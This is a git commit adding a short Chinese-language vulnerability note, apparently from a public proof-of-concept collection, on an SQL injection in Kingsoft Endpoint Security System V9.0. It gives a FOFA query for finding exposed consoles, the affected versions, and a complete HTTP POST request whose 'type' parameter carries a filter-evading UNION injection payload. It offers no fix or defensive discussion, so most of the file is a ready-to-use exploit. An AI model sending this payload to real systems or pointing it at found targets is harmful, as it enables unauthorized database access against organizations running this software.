Create 金山终端安全系统V9.0 SQL注入漏洞.md

2023-10-21 09:30:44 +08:00 · 2023-10-21 09:30:44 +08:00 · fc8c38e36c
commit fc8c38e36c
parent 6419808fae
1 changed files with 19 additions and 0 deletions
--- a/金山终端安全系统V9.0
+++ b/金山终端安全系统V9.0
@ -0,0 +1,19 @@
+## 金山终端安全系统V9.0 SQL注入漏洞
+
+## fofa查询语法
+```
+app="金山终端安全系统V9.0Web控制台"
+```
+
+## 影响版本
+金山终端安全系统 V9.0 < V9.SP1.E1008
+
+## POC
+```
+POST /inter/update_software_info_v2.php HTTP/1.1 
+Content-Type: application/x-www-form-urlencoded 
+Host: ip:port
+Content-Length: 81
+
+type=--1E0union/**/se#lect-1E0,2,1,user(),5,6,7,8--&key=123&pageCount=1&curPage=1
+```